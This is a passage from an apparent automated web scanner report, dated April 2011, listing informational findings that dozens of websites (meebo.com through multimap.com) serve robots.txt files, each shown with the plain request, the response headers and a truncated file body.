Disallow: /viewprogram/*_pnt
Disallow: /druginfo/monoinfobyid*

24.522. http://www.meebo.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.meebo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.meebo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 02 Apr 2011 13:36:10 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 99
Last-Modified: Sat, 12 Mar 2011 00:10:18 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /httpstest.html
Disallow: /httpsokay.html
Disallow: /mcmd/
Disallow: /cmd/

24.523. http://www.meetlocals.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.meetlocals.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.meetlocals.com

Response

HTTP/1.1 200 OK
Server: Zeus/4.3
Date: Sat, 02 Apr 2011 13:26:39 GMT
Connection: close
Content-Length: 68
Accept-Ranges: bytes
Content-Type: text/plain
Last-Modified: Fri, 25 Mar 2011 17:26:11 GMT

User-agent: *
Allow: /
Disallow: /public/login2
Disallow: /members


24.524. http://www.meetup.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.meetup.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.meetup.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:20 GMT
Server: Apache-Coyote/1.1
ETag: W/"68-1296133100000"
Last-Modified: Thu, 27 Jan 2011 12:58:20 GMT
Content-Type: text/plain; charset=ISO-8859-1
Content-Length: 68
Vary: Accept-Encoding,User-Agent
Connection: close

Sitemap: http://www.meetup.com/sitemap.xml

User-agent: *
Disallow:

24.525. http://www.megaupload.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.megaupload.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.megaupload.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:26 GMT
Server: Apache
Last-Modified: Fri, 12 Jan 2007 01:57:26 GMT
ETag: "24"
Accept-Ranges: bytes
Content-Length: 36
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: ia_archiver
Disallow: /

24.526. http://www.menshealth.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.menshealth.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 04 May 2009 16:53:36 GMT
ETag: "b2-d68400"
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:36:12 GMT
Content-Length: 178
Connection: close

User-agent: *
Disallow: /event.ng/
Disallow: /html.ng/
Disallow: /js.ng/
Disallow: /click.ng/
Disallow: /image.ng/
Disallow: /ping.ng/
Disallow: /mharchive/

24.527. http://www.menuism.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.menuism.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.menuism.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Sat, 02 Apr 2011 14:03:11 GMT
Content-Type: text/plain
Content-Length: 3645
Last-Modified: Tue, 15 Mar 2011 16:19:25 GMT
Connection: close
Accept-Ranges: bytes

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file

# robots we really don't want
User-agent: ia_archiver
User-agent: SlySearch
User-agent: turnitinbot
...[SNIP]...

24.528. http://www.menupages.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.menupages.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.menupages.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:12 GMT
Server: Apache
Cache-Control: max-age=300
Expires: Sat, 02 Apr 2011 14:01:12 GMT
Connection: close
Content-Type: text/plain
Vary: Accept-Encoding

#
# MenuPages.com: robots.txt
# Please, we do NOT allow nonauthorized robots.
#
# 1. A robot may not injure a human being or, through inaction, allow a
# human being to come to harm.
#
# 2. A r
...[SNIP]...

24.529. http://www.merchantcircle.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.merchantcircle.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.merchantcircle.com

Response

HTTP/1.0 200 OK
Connection: close
Expires: Sat, 02 Apr 2011 13:44:18 GMT
Cache-Control: max-age=3600
Content-Type: text/plain
ETag: "-6597865621079513402"
Accept-Ranges: bytes
Last-Modified: Thu, 31 Mar 2011 22:46:43 GMT
Content-Length: 4707
Date: Sat, 02 Apr 2011 12:44:18 GMT
Server: lighttpd/1.4.11

User-agent: Mediapartners-Google
Disallow: /ajax
Disallow: /ajax/
Disallow: /map
Disallow: /signup
Disallow: /auth
Disallow: /merchant
Disallow: /redirect
Disallow: /ads
Disallow: /profile
Disallow: /
...[SNIP]...

24.530. http://www.merck.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.merck.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.merck.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:59:17 GMT
Server: Apache
Set-Cookie: unique_visitor=173.193.214.243.1301752757223553; path=/; expires=Sun, 01-Apr-12 13:59:17 GMT
Last-Modified: Tue, 22 Jun 2010 18:50:13 GMT
ETag: "a0a244-1f9-e4318340"
Accept-Ranges: bytes
Content-Length: 505
P3P: policyref="http://www.merck.com/w3c/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OUR DELa LEG PHY ONL UNI COM NAV INT DEM STA HEA PRE LOC"
Connection: close
Content-Type: text/plain
Set-Cookie: BIGipServerwww.merck.com-HTTP=42209452.20480.0000; path=/

User-Agent: *
Disallow: /htbin/
Disallow: /includes/
Disallow: /css/
Disallow: /images/
Disallow: /websearch.html
Disallow: /hcp/adverse_experience/
Disallow: /message
Disallow: /policy/tax_ex
...[SNIP]...

24.531. http://www.mercola.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mercola.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mercola.com

Response

HTTP/1.0 200 OK
Content-Length: 571
Content-Type: text/plain
Last-Modified: Tue, 20 Jul 2010 07:52:29 GMT
Accept-Ranges: bytes
ETag: "82af9980e027cb1:769f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:05:07 GMT
Connection: close

User-agent: *
Sitemap: http://www.mercola.com/sitemap.xml
Disallow: /fcgi/pf/
Disallow: /display/PrintPage
Disallow: /pf/
Disallow: /LT/
Disallow: /wkst/
Disallow: /CMSHelp/
Disallow: /CMSForu
...[SNIP]...

24.532. http://www.metacafe.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metacafe.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.metacafe.com

Response

HTTP/1.0 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:23:04 GMT
Content-Length: 1146
Connection: close
Set-Cookie: PHPSESSID=fe63cbcae5bca106cd4010e842f98f5e; path=/; domain=.metacafe.com
Set-Cookie: User=%7B%22sc%22%3A1%2C%22visitID%22%3A%22eceae43e1ecf18e9cebf605296cea604%22%2C%22LEID%22%3A40%2C%22LangID%22%3A%22en%22%2C%22npUserLocations%22%3A%5B244%5D%2C%22npUserLanguages%22%3A%5B0%2C9%5D%2C%22ffilter%22%3Atrue%7D; expires=Thu, 31-Mar-2016 13:23:04 GMT; path=/; domain=.metacafe.com
Set-Cookie: dsavip=1555042476.20480.0000; expires=Sat, 02-Apr-2011 14:23:04 GMT; path=/

User-agent: *
Disallow: /account/
Disallow: /bourne/mashup/?id=
Disallow: /bourne/mixer/?id=
Disallow: /disclaimer
Disallow: /f/
Disallow: /family_filter
Disallow: /fplayer.php
Disallow: /invi
...[SNIP]...

24.533. http://www.metafilter.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metafilter.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.metafilter.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:42:46 GMT
Server: Apache
Last-Modified: Tue, 22 Feb 2011 22:37:56 GMT
ETag: "a000000048ae8-7ec-49ce6a1b362a6"
Accept-Ranges: bytes
Content-Length: 2028
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

#
# robots txt v. 1.08 Feb 22 2011 (googlebot changes)
# robots txt v. 1.07 Aug 04 2010 (008 disallow)
# robots txt v. 1.06 Dec 22 2009 (yahoo pipes tags disallow, generic crawl-delay)
# robots.t
...[SNIP]...

24.534. http://www.metrolyrics.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metrolyrics.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.metrolyrics.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
ETag: "44-4c99329e-0"
Last-Modified: Tue, 21 Sep 2010 22:33:02 GMT
Content-Type: text/plain
Content-Length: 68
Cache-Control: max-age=18683
Date: Sat, 02 Apr 2011 13:25:39 GMT
Connection: close

User-agent: *
Disallow: /images/lid/

User-agent: ccbot
Disallow: /

24.535. http://www.metromix.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metromix.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.metromix.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:29 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7a
Last-Modified: Wed, 30 Mar 2011 15:51:03 GMT
ETag: "3285b5-90-24d9e7c0"
Accept-Ranges: bytes
Content-Length: 144
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=8
Connection: Keep-Alive
Content-Type: text/plain

# See http://www.robotstxt.org/wc/norobots.html for documentation
User-agent: *
Disallow: /javascripts/
Disallow: /secure/
Disallow: /webtools/

24.536. http://www.metropcs.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metropcs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.metropcs.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: private
Content-Length: 80
Content-Type: text/plain
Last-Modified: Wed, 30 Mar 2011 21:30:20 GMT
Accept-Ranges: bytes
ETag: "03e79ab21efcb1:0"
Set-Cookie: ObSSOCookie=ZCF75OXJkwColRWqWXwMtNP8t8%2Fyz0bQI6Dojvh%2B8Htzkn28JIxoxxgbA1O%2Fux1t9nqPkRFQiInjFlBEPfsMFvi58fzco6LkDCgm%2B%2Bqn8ySjTkkhgWLoRY07pnvZ%2FRM0ZdDtE%2BunESvytRlfh%2BiH%2BoNXTT7DJmES4yokVRSAL6epeN59CVPjxUuXBUpH5uYt05L0Av3GKLoB1J8Z%2B%2FPPesDjTOSHP%2FmmHJVKrRBhLldM07Kn%2BKL1UGmVT53Q37fFnx2ceIHw4StxZsYFqiLI86w9O7%2Bpmra%2Bii%2FP9WNzNFz5ueOI1EgwgQkO3nGG00xT; httponly; path=/; domain=.metropcs.com;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:51:34 GMT
Connection: close

User-agent: *
Disallow: /*.axd$
Disallow: /heartbeat.htm
Disallow: /query.asp

24.537. http://www.mgid.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mgid.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mgid.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:31:37 GMT
Content-Type: text/plain
Connection: close
Content-Length: 203

User-agent: *
Disallow: /search/
Disallow: /redirect/
Disallow: /news/
Disallow: /rnews/

User-agent: Yandex
Disallow: /search/
Disallow: /redirect/
Disallow: /news/
Disallow: /rnews/
Host: marketgid.
...[SNIP]...

24.538. http://www.miamiherald.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.miamiherald.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.miamiherald.com

Response

HTTP/1.0 200 OK
Server: Apache/1.3.41
Last-Modified: Thu, 14 Oct 2010 19:33:30 GMT
ETag: "1f40f0d-454-4cb75b0a"
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:42:17 GMT
Content-Length: 1108
Connection: close

#last modified 1-06-10

User-agent: *
Disallow:/834 #email_templates
Disallow:/819 #errors
Disallow:/679 #Need To Map
Disallow:/585 #Services
Disallow:/829 #Orthodox Miami
Disallow:/1214 #Orthodox
...[SNIP]...

24.539. http://www.michaels.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.michaels.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.michaels.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:20 GMT
Server: Demandware eCommerce Server
Content-Length: 77
Cache-Control: public;max-age=56260
Expires: Sun, 03 Apr 2011 05:18:00 GMT
Last-Modified: Sat, 02 Apr 2011 05:18:00 GMT
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: close
Content-Type: text/plain

User-Agent: *
Allow: /

Sitemap: http://www.michaels.com/sitemap_index.xml

24.540. http://www.michigan.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.michigan.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.michigan.gov

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:48 GMT
Server: IBM_HTTP_Server
Last-Modified: Wed, 17 Mar 2010 14:28:12 GMT
ETag: "22b-16e-ec8ab700"
Accept-Ranges: bytes
Content-Length: 366
Cache-Control: public, max-age=86400
Connection: close
Content-Type: text/plain

# robots.txt for http://www.michigan.gov
User-agent: *
Disallow: /minewswire/
Disallow: /printerFriendly/
Disallow: /textonly/
Disallow: /rss/
Disallow: /wml/
Disallow: /emailthispage/
Disallow: /podc
...[SNIP]...

24.541. http://www.microsofttranslator.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.microsofttranslator.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.microsofttranslator.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 07 Feb 2011 20:04:05 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Vary: Accept-Encoding
Cache-Control: public, max-age=11014926
Date: Sat, 02 Apr 2011 13:26:56 GMT
Connection: close
Content-Length: 1698

User-agent: *
Disallow: /bmi/
Disallow: /BVFrame.aspx
Disallow: /BVSandbox.aspx
Disallow: /cashback/admin
Disallow: /cashback/go
Disallow: /challenge
Disallow: /community/forums/tags
Disallow:
...[SNIP]...

24.542. http://www.military.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.military.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.military.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:28:32 GMT
Server: Apache
Cache-Control: max-age=6000
Expires: Sat, 02 Apr 2011 15:08:32 GMT
Last-Modified: Mon, 29 Mar 2010 20:11:51 GMT
ETag: "8bc632-417-4bb10987"
Accept-Ranges: bytes
Content-Length: 1047
Content-Type: text/plain
Connection: close

User-agent: *
Disallow: /*wh=
Disallow: /*?col=
Disallow: /*esrc=
Disallow: http://www.military.com/ContentFiles/NEW%20_Retirement_HR_1588.htm
Disallow: http://www.military.com/Education/SchoolHe
...[SNIP]...

24.543. http://www.mindjolt.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mindjolt.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mindjolt.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:44 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 12 Feb 2009 11:15:06 GMT
ETag: "3600c2-57-462b6d51f2280"
Accept-Ranges: bytes
Content-Length: 87
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Allow: /

User-agent: Googlebot
Disallow: /*jsessionid
Disallow: /*mode=

24.544. http://www.miracleworkers.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.miracleworkers.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.miracleworkers.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Last-Modified: Wed, 16 Mar 2011 13:10:16 GMT
Accept-Ranges: bytes
ETag: "c834ed7ddbe3cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-PBY: BEARWEB56
Date: Sat, 02 Apr 2011 13:54:04 GMT
Connection: close
Content-Length: 5654

User-agent: Mediapartners-Google*
Disallow:

User-agent: Google*
Disallow: /Custom/
Disallow: /custom/
Disallow: /Partner/
Disallow: /partner/
Disallow: /PSA/
Disallow: /psa/
Disallow: /RTQ
...[SNIP]...

24.545. http://www.mlb.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mlb.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mlb.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:07 GMT
Server: Sun-ONE-Web-Server/6.1
Last-Modified: Wed, 15 Mar 2006 17:08:42 GMT
ETag: "1a-a0b33a80"
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=10
Expires: Sat, 02 Apr 2011 13:25:17 GMT
Keep-Alive: timeout=120, max=526
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /

24.546. http://www.mlive.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mlive.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mlive.com

Response

HTTP/1.0 200 OK
Server: Apache
Cache-Control: max-age=1
Expires: Sat, 02 Apr 2011 14:00:26 GMT
P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM'
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 14:00:25 GMT
Content-Length: 595
Connection: close
Set-Cookie: Apache=69.2.101.254.1301752825968513; path=/; expires=Sun, 01-Apr-12 14:00:25 GMT

# Robots.txt for http://www.mlive.com/
# Last updated 03/01/2011

Sitemap: http://blog.mlive.com/www-sitemapindex.xml

User-agent: *
Disallow: /auctions/
Disallow: /cgi-bin/
Disallow: /printer/
Disal
...[SNIP]...

24.547. http://www.mocospace.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mocospace.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mocospace.com

Response

HTTP/1.0 200 OK
Server: Resin/4.0.6
ETag: "FyZeLr/gwrF"
Last-Modified: Wed, 30 Mar 2011 14:01:53 GMT
Accept-Ranges: bytes
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 7506
Date: Sat, 02 Apr 2011 13:53:31 GMT
Connection: close

User-agent: *
Sitemap: http://www.mocospace.com/sitemap-html.xml
Sitemap: http://www.mocospace.com/sitemap-xhtml.xml
Sitemap: http://www.mocospace.com/sitemap.jsp?f=sitemap_user-1
Sitemap: http://
...[SNIP]...

24.548. http://www.modelmayhem.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.modelmayhem.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.modelmayhem.com

Response

HTTP/1.1 200 OK
Server: IBSrv 1.0
Date: Sat, 02 Apr 2011 13:34:57 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
Last-Modified: Thu, 28 Oct 2010 00:08:18 GMT
ETag: "2e6cb86-87-493a223982080"
Accept-Ranges: bytes
Content-Length: 135
Vary: Accept-Encoding
Set-Cookie: BIGipServermodelmayhem_POOL=283381932.0.0000; path=/

User-agent: Mediapartners-Google
Disallow:
User-agent: Googlebot
Disallow:
User-agent: MSNBot
Disallow:
User-agent: Slurp
Disallow:

24.549. http://www.momswhothink.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.momswhothink.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.momswhothink.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 14:02:33 GMT
Content-Type: text/plain
Content-Length: 304
Last-Modified: Tue, 21 Jul 2009 16:14:38 GMT
Connection: close
Expires: Sat, 09 Apr 2011 14:02:33 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

24.550. http://www.moviesunlimited.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moviesunlimited.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.moviesunlimited.com

Response

HTTP/1.1 200 OK
Content-Length: 258
Content-Type: text/plain
Last-Modified: Thu, 02 Dec 2010 22:19:54 GMT
Accept-Ranges: bytes
ETag: "c65ce4b6f92cb1:3442"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:53:31 GMT
Connection: close

# MoviesUnlimited.com Robots File

User-agent: ImageBot
Disallow: /

User-agent: *
Disallow: /musite/error_pages/
Disallow: /musite/member/
Disallow: /musite/affiliate/
Disallow: /musite/popu
...[SNIP]...

24.551. http://www.movietickets.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.movietickets.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.movietickets.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 05 Oct 2005 20:43:22 GMT
Accept-Ranges: bytes
ETag: "1e39146dedc9c51:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:36:31 GMT
Connection: close
Content-Length: 562

User-agent: *
Disallow: /ads/
Disallow: /inc/
Disallow: /style/
Disallow: /scripts/
Disallow: /mapquest/
Disallow: /images/
Disallow: /images_newsletter/
Disallow: /rep/
Disallow: /cgi-bin/

...[SNIP]...

24.552. http://www.mozilla.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mozilla.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mozilla.com

Response

HTTP/1.1 200 OK
Server: Apache
X-Backend-Server: pp-web03
Cache-Control: max-age=900
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:28:50 GMT
Keep-Alive: timeout=20, max=978
Expires: Sat, 02 Apr 2011 13:43:50 GMT
ETag: "1d80c4c-49-4990653d27e80"
Last-Modified: Tue, 04 Jan 2011 14:46:02 GMT
Content-Length: 73
Connection: close
X-Cache-Info: cached

User-agent: *
Disallow: /*/products/download.html
Disallow: /*/download/

24.553. http://www.mp3lyrics.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mp3lyrics.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mp3lyrics.org

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 25 Mar 2011 09:28:20 GMT
ETag: "284b9a0-508-49f4b36f17500"
Cache-Control: max-age=86400
Expires: Sat, 02 Apr 2011 21:43:24 GMT
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
Content-Language: en
Content-Length: 1288
Date: Sat, 02 Apr 2011 14:13:58 GMT
X-Varnish: 2107313521 2103462317
Age: 59434
Via: 1.1 varnish
Connection: close

User-agent: Baiduspider
Crawl-Delay: 1
Request-Rate: 1/1
Allow: /
Disallow: /Trk/
Disallow: /In/
Disallow: /Out/
Disallow: /php/

User-agent: Googlebot
Allow: /
Disallow: /Trk/
Disallow: /In/
Disallow
...[SNIP]...

24.554. http://www.mp3raid.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mp3raid.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mp3raid.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:03 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.1
Last-Modified: Wed, 10 Feb 2010 11:37:03 GMT
ETag: "6050053-287-47f3d740415c0"
Accept-Ranges: bytes
Content-Length: 647
Connection: close
Content-Type: text/plain

#########################################
#########################################
### The following command will disable just the directory "private" and all its contents:
### Disallow: /private/
##
...[SNIP]...

24.555. http://www.mrmovietimes.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mrmovietimes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mrmovietimes.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:00:53 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch13 mod_ssl/2.2.3 OpenSSL/0.9.8c
Last-Modified: Thu, 20 Jan 2011 02:56:47 GMT
ETag: "e3-49a3e48ceb9c0"
Accept-Ranges: bytes
Content-Length: 227
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /test/
Disallow: /includes/
Disallow: /movie-theaters/printable.php
Disallow: /movie-theaters/my-theaters.html
Disallow: /fb-connect/
Sitemap: http://www.mrmovietimes.com
...[SNIP]...

24.556. http://www.msnbc.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 30 Jun 2010 19:46:20 GMT
Accept-Ranges: bytes
ETag: "0e5fe98c18cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:46:09 GMT
Connection: close
Content-Length: 151

# robots.txt file for www.msnbc.com, www.cnbc.com

User-agent: *
Disallow: error404.aspx

Sitemap: http://www.msnbc.msn.com/xml/SitemapIndex.xml

24.557. http://www.mtv.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mtv.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Thu, 31 Mar 2011 17:54:56 GMT
ETag: "4797a10-1cc-49fcafdbbdc00"
Accept-Ranges: bytes
Content-Length: 460
Content-Type: text/plain
Cache-Control: max-age=1800
Date: Sat, 02 Apr 2011 12:43:43 GMT
Connection: close

Sitemap: http://www.mtv.com/sitemap_index.jhtml
User-agent: *
Disallow: /search/
Disallow: /*source=SEM_    
Disallow: /*partnersearch=
Disallow: /*searchterm=
Disallow: /*sicontent=
Disallow: /ne
...[SNIP]...

24.558. http://www.multimap.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.multimap.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.multimap.com

Response

HTTP/1.0 200 OK
Content-Length: 1879
Content-Type: text/plain
Last-Modified: Mon, 28 Mar 2011 21:36:26 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Cache-Control: public, max-age=15552000
